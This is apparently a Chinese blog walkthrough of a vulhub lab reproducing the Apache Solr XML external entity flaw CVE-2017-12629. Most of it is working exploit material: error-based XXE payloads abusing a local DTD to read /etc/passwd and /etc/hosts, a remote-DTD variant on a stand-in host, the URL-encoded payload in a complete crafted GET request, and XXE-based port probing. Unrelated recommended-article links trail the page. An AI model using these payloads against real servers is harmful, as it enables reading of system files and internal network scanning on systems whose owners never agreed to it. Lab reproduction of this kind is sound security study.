Apache Solr XXE(CVE-2017-12629)--vulhub

Apache solr XML 实体注入漏洞(CVE-2017-12629)

XXEpayload

xml 复制代码
<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % expr 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/hosts">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>
<message>any text</message>

其他dtd文件

利用jar包中的dtd文件

xml-dtd 复制代码
<!ENTITY % local_dtd SYSTEM "jar:file:///opt/solr/server/solr-webapp/webapp/WEB-INF/lib/lucene-queryparser-7.0.1.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd">

远程dtd文件

xml-dtd 复制代码
<!ENTITY % local_dtd SYSTEM "http://evil.host.name/include.dtd">

### include.dtd ### 
<!ENTITY % test "example">
<!ELEMENT pattern (%test;)>

单行payload

xml 复制代码
<?xml version="1.0" ?><!DOCTYPE message [    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">    <!ENTITY % expr 'aaa)>        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">        &#x25;eval;        &#x25;error;        <!ELEMENT aa (bb'>    %local_dtd;]><message>any text</message>

将payload进行url编码(xxe代码转为单行后的代码)

复制代码
%3C%3Fxml%20version%3D%221.0%22%20%3F%3E%3C!DOCTYPE%20message%20%5B%20%20%20%20%3C!ENTITY%20%25%20local_dtd%20SYSTEM%20%22file%3A%2F%2F%2Fusr%2Fshare%2Fxml%2Ffontconfig%2Ffonts.dtd%22%3E%20%20%20%20%3C!ENTITY%20%25%20expr%20%27aaa)%3E%20%20%20%20%20%20%20%20%3C!ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%20%20%20%20%20%20%20%20%3C!ENTITY%20%26%23x25%3B%20eval%20%22%3C!ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%20%20%20%20%20%20%20%20%3C!ELEMENT%20aa%20(bb%27%3E%20%20%20%20%25local_dtd%3B%5D%3E%3Cmessage%3Eany%20text%3C%2Fmessage%3E

构造数据包发送

复制代码
GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221.0%22%20%3F%3E%3C!DOCTYPE%20message%20%5B%20%20%20%20%3C!ENTITY%20%25%20local_dtd%20SYSTEM%20%22file%3A%2F%2F%2Fusr%2Fshare%2Fxml%2Ffontconfig%2Ffonts.dtd%22%3E%20%20%20%20%3C!ENTITY%20%25%20expr%20%27aaa)%3E%20%20%20%20%20%20%20%20%3C!ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%20%20%20%20%20%20%20%20%3C!ENTITY%20%26%23x25%3B%20eval%20%22%3C!ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%20%20%20%20%20%20%20%20%3C!ELEMENT%20aa%20(bb%27%3E%20%20%20%20%25local_dtd%3B%5D%3E%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
Host: 192.168.200.142:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i

进行发包,响应包是400,结果回显到了响应包中

读取/etc/passwd

读取/etc/hosts文件

复制代码
<?xml version="1.0" ?><!DOCTYPE message [    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">    <!ENTITY % expr 'aaa)>        <!ENTITY &#x25; file SYSTEM "http://192.168.200.142:8983">        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">        &#x25;eval;        &#x25;error;        <!ELEMENT aa (bb'>    %local_dtd;]><message>any text</message>

返回包400,有命令回显

使用http探测端口开放情况

复制代码
<?xml version="1.0" ?><!DOCTYPE message [    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">    <!ENTITY % expr 'aaa)>        <!ENTITY &#x25; file SYSTEM "http://192.168.200.142:8983">        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">        &#x25;eval;        &#x25;error;        <!ELEMENT aa (bb'>    %local_dtd;]><message>any text</message>

这里探测8983端口,解析xml出错,说明端口是开放的

22端口则提示不合法的http

未开放端口则会提示,拒绝连接

相关推荐
HashData酷克数据3 小时前
官宣:Apache Cloudberry (Incubating) 2.0.0 发布!
数据库·开源·apache·cloudberry
XMYX-08 小时前
解决 Apache/WAF SSL 证书链不完整导致的 PKIX path building failed 问题
网络协议·apache·ssl
IT·陈寒9 小时前
怎么这么多 StringUtils —— Apache、Spring、Hutool 全面对比
java·spring·apache
risc1234561 天前
【lucene】advanceshallow就是遍历跳表的,可以看作是跳表的遍历器
lucene
cyh男1 天前
Lucene 8.7.0 版本的索引文件格式
搜索引擎·全文检索·lucene
喂完待续1 天前
【Big Data】云原生与AI时代的存储基石 Apache Ozone 的技术演进路径
云原生·架构·apache·big data·序列晋升
risc1234562 天前
【lucene核心】impacts的由来
lucene
todoitbo2 天前
时序数据库选型指南:Apache IoTDB快速部署与实战应用
apache·时序数据库·iotdb
IDOlaoluo2 天前
apache-jmeter-5.1.1安装部署与使用教程(小白一看就会)
jmeter·apache
倔强的石头1063 天前
时序数据库选型指南:为何Apache IoTDB成为工业物联网首选
apache·时序数据库·iotdb